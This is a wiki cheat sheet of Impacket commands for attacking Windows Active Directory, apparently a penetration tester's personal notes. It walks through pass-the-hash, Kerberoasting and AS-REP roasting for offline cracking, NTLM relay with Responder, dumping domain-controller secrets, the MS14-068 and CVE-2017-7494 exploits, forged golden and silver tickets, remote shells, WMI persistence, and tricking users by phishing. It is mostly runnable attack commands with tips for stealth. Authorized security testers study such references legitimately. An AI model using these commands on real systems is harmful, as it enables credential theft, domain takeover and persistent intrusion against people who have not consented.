Impacket - CraigDonkin/Infrastructure GitHub Wiki
https://github.com/fortra/impacket
[TOC]
## atexec.py
- Executes a command on the target via the Task Scheduler service
- Can pass the hash if you don't have the password
```
python3 atexec.py domain\user@host command
```
## dcomexec.py
- Creates a semi-interactive shell
- The victim will see cmd prompts or other programs pop up in their session
- Not the best to use as a result
- Can use put and get to upload and download files
- An optional command can be added to the end; this won't return an interactive shell, it just executes the command
```
python3 dcomexec.py domain\user@host {command}
```
## esentutl.py
- Allows you to extract tables from an ntds.dit file
- To extract the hash datatable in a way that minimizes the space used, run:
```
esentutl.py /path/to/ntds.dit export -table datatable | grep -E "ATTk590689|ATTm3|ATTm590045|ATTr589970|ATTk589914|ATTk589879|ATTk589984|ATTk589918" > output
```
- impdump can be used to extract the hashes
## GetADUsers.py
- Enumerates the users on a domain
- Needs valid credentials
```
python3 GetADUsers.py -all domain\User -dc-ip ip
```
## getArch.py
- Gets the target's architecture
```
python3 getArch.py -target ip
```
## GetNPUsers.py
- Queries the target domain for users that have 'Do not require Kerberos preauthentication' set
- Exports the TGTs for cracking
- Can pass the hash as auth
- Use -no-pass when querying a single user, otherwise a badPwdCount will be added to the user
```
# Get TGT for a specific user
python3 GetNPUsers.py domain\user -no-pass
# Get list of users with UF_DONT_REQUIRE_PREAUTH set (needs a user password)
python3 GetNPUsers.py domain\user:password
# Request TGTs for all users
python3 GetNPUsers.py domain\user:password -request -outputfile out.txt -format hashcat
```
## getPac.py
- Returns the target user's PAC
- Can use pass the hash
```
getPac.py -targetuser USER domain/username:password
```
## getST.py
- Allows you to request a service ticket and save it as ccache
- Can be used with pass the hash
```
python3 getST.py -hashes lm:nt -spn cifs/dc.fqdn domain/username
```
- If the account has constrained delegation you can use -impersonate to request the ticket on behalf of another user
- Allows you to impersonate a user, get the TGT and then save it in ccache
- This will impersonate the username (target domain admins etc.) and have admin access on the DC
```
python3 getST.py -spn cifs/dc.fqdn domain\machin\share -impersonate username
```
- Can only impersonate the user on the DC; then use the ticket:
```
export KRB5CCNAME=ticket.ccache
secretsdump.py -k -no-pass dc.fqdn
```
## getTGT.py
- Requests a TGT and saves it as ccache
- Overpass-the-hash attack
- Can be used with pass the hash
```
python3 getTGT.py -hashes lm:nt domain/username
```
- Using an AES key:
```
python3 getTGT.py -dc-ip <ip> -aesKey <aeskey> <domain>/<username>
```
- Post exploitation:
```
export KRB5CCNAME=user.ccache
klist
python3 secretsdump.py -k -no-pass dc.fqdn
python3 psexec.py -dc-ip <ip> -target-ip <ip> -no-pass -k <domain>/<username>@<host>
```
## GetUserSPNs.py
- Performs SPN listing
- Requires valid domain credentials
- Retrieves service account hashes in JTR format
- Can use pass the hash or a previously compromised Kerberos ticket
```
python3 GetUserSPNs.py -request -dc-ip ip domain/user
```
- Then try to crack the tickets
## goldenPac.py
- MS14-068 exploit
- Works against DC <= Windows 2008R2
- Requires a valid domain account
- Saves the golden ticket and returns a psexec session
```
python3 goldenPac.py -dc-ip ip domain/username:password@hostname
```
## ifmap.py
- Scans for listening DCERPC interfaces
- Tries to bind to each interface and reports whether the interface is listed and/or listening
```
python3 ifmap.py host ip
```
## karmaSMB.py
- Answers a file read request with a predefined file based on the extension asked for
- Needs a config file:
```
bat = /tmp/batchfile
com = /tmp/comfile
exe = /tmp/exefile
```
- SMB2
- If 2 different file names are requested at the same share, the first one will work; the second only if the request is performed right away
- Could be used to get authentication requests and then code execution
- Send users a false logon.bat etc.
- Can be used as part of the MS15-011 exploit
## lookupsid.py
- Can be used with PTH
- Enumerates users and SIDs
```
python3 lookupsid.py -target-ip ip user:password
```
## mimikatz.py
- Can be used with PTH
- You have to have mimikatz running on the target machine
- Within mimikatz on the target:
```
mimikatz # rpc::server
```
- From the attacker laptop:
```
python3 mimikatz.py domain/user@ip
```
- You then get a mimikatz shell from which you can execute mimikatz commands
## mssqlclient.py
- Can be used with PTH
- Use -windows-auth for Windows auth
- Interactive SQL client for MSSQL
```
python3 mssqlclient.py -p port domain/username:password@target
```
- Once the command prompt returns you can execute SQL commands:
```
SQL> SELECT name FROM master.dbo.sysdatabases
```
## mssqlinstance.py
- Queries the remote host for MSSQL instances
```
python3 mssqlinstance.py target
```
## netview.py
- Returns a list of sessions opened at the target host
- You have to be able to resolve the domain machines' NetBIOS names
- Can query the whole domain:
```
python3 netview.py -target ip domain/username
```
- Or just a single machine:
```
python3 netview.py -target ip username
```
- Getting errors when running - come back to
## ntfs-read.py
- NTFS read-only explorer
- Example volumes:
```
\\.\C
/dev/disk1
```
```
python3 ntfs-read.py -extract EXTRACT volume
```
## ntlmrelayx.py
- Relays NTLMv1/v2 hashes
- Uses a lot of protocols:
  - SMB
  - MSSQL
  - LDAP
  - HTTP
  - SMTP
- SMB signing needs to be disabled on the machine you're relaying to
- Use with other tools, for example:
- Responder to intercept authentication attempts:
```
responder.py -I interface -r -d -w
```
- CrackMapExec to generate a list of targets:
```
cme smb iprange --gen-relay-list targets
```
- ntlmrelayx with the list of targets:
```
python3 ntlmrelayx.py -tf targets -c command
```
## opdump.py
- Binds to the hostname:port and DCERPC interface
- Calls each of the first 256 operation numbers
- Reports the outcome of each call
```
python3 opdump.py host port interface version
```
## ping6.py
- Performs an ICMPv6 ping
- Uses ICMP echo and echo-reply packets
```
python3 ping6.py sourceIP destIP
```
## ping.py
- ICMP echo ping
- If the host is up you get an echo-reply packet
- Didn't work with python3 when I tried it
```
python ping.py sourceIP destIP
```
## psexec.py
- Implementation of psexec
- Uses RemComSvc for the shell
- Can be used with PTH
```
python3 psexec.py DOMAIN/USER@HOST command
```
- Use cmd.exe as the command to get a shell rather than executing a single command
- Likely to be detected by AV
- Not working come back to
## rdp_check.py
- Checks if an account is valid on the host using RDP
- Can be used with PTH
```
python3 rdp_check.py DOMAIN/USER@host
```
## registry-read.py
- Parses offline registry hives
```
python3 registry-read.py hive enum_values -name name
```
## reg.py
- Remote registry manipulation
- Need to escape \ in the keyName
- Works with PTH
```
python3 reg.py Domain/User@host query -keyName key -s
```
## rpcdump.py
- Dumps the remote RPC endpoint information
- Works with PTH
```
python3 rpcdump.py ipaddress
```
## sambaPipe.py
- Exploits CVE-2017-7494
- Uploads and executes an .so specified via the -so parameter
```
python3 sambaPipe.py DOMAIN/USER@host -so /path/to/so
```
## samrdump.py
- Downloads a list of users for the target system
- Works with PTH
- Can export to a CSV
```
python samrdump.py DOMAIN/USER@Host
```
## secretsdump.py
- Dumps secrets from the target
- Can be used with PTH
- Can parse offline files:
  - -system SYSTEM
  - -bootkey BOOTKEY
  - -security SECURITY
  - -sam SAM
  - -ntds NTDS
- Can specify the exec method when using -use-vss:
  - smbexec
  - wmiexec
  - mmcexec
- Extract only a single user: `-just-dc-user username`
- Extract only NTDS.DIT data: `-just-dc`, `-just-dc-ntlm`
```
python3 secretsdump.py DOMAIN/USER@Host
python3 secretsdump.py -ntds /path/to/offline/ntds.dit -system /path/to/system local
```
## services.py
- Manipulate services on a host:
  - start
  - stop
  - delete
  - status
  - config
  - list
  - create
  - change
- Works with PTH
```
python3 services.py IEWIN7/USER@HOST list
```
## smbclient.py
- Lets you list files on an SMB share
- Upload and download files
- Create directories
- Works with PTH
```
python3 smbclient.py DOMAIN/USER@Host
```
- Once connected, list shares and connect to one:
```
shares
use sharename
```
- Use ls/cd/pwd etc. like on Linux
- Use put/get to upload/download
- Files are saved to the directory you launched the script from
## smbexec.py
- Similar to psexec
- Gives you a semi-interactive shell
- Executes commands on the target
- Supports PTH
- You will likely be executing commands as SYSTEM
```
python3 smbexec.py DOMAIN/USER@IP
```
## smbrelayx.py
- Performs SMB relay attacks
- Good blog: https://evilenigma.blog/2017/03/19/lateral-movement-with-smbrelayx-py/
```
python3 smbrelayx.py -h victimIP -c "command to execute"
```
- Trick the victim into performing an SMB action, such as clicking a UNC path provided via phishing/social engineering
- The command will then be relayed to the victim host
## smbserver.py
- Creates an SMB server
- Needs to be run as root
- Won't enforce auth unless you pass `-username USERNAME` and `-password PASSWORD`
```
python3 smbserver.py shareName sharePath
```
## sniffer.py
- Packet sniffer
- Needs root to open the socket
- Need to specify the protocol:
  - tcp
  - udp
  - icmp
```
sudo python3 sniffer.py tcp
```
## sniff.py
- Sniffer
- Needs pcapy:
```
apt-get install python-pcapy
```
- Specify the interface you want to sniff on or use 'any'
- Need to be root
```
sudo python sniff.py interface
```
## split.py
- Splits pcap dump files
```
sudo python split.py pcapfile
```
## ticketer.py
- Can be used to generate Kerberos golden/silver tickets
- Then use it with psexec etc.
```
python ticketer.py -nthash hash -domain-sid sid -domain domain username
export KRB5CCNAME='username.ccache'
python psexec.py -k -n DOMAIN/USERNAME@IP cmd
```
## ticketConverter.py
- If you have a ticket in kirbi format, you can convert it into ccache format for Impacket
- Make sure the kirbi ticket is decoded from base64 and saved as <username>.kirbi
```
echo -en <base64 ticket> | base64 -d > <user>.kirbi
python3 ticketConverter.py <user.kirbi> <user.ccache>
```
## wmiexec.py
- Creates a semi-interactive shell using WMI
- Can be used with PTH
- Needs admin
- Doesn't install anything on the host, so stealthy
```
python3 wmiexec.py DOMAIN/Username@host
```
- Can use `put src_file dst_path` and `get file` to transfer files
- To execute commands on the localhost run:
```
! cmd
```
## wmipersist.py
- Persistence method
- Creates a WMI event on the target
- Works with PTH
```
python3 wmipersist.py DOMAIN/USER@HOST install -name name -vbs VBSfile -timer TIMER
```
## wmiquery.py
- Provides a shell for executing WMI queries
- Works with PTH
```
python3 wmiquery.py DOMAIN/USER@Host
```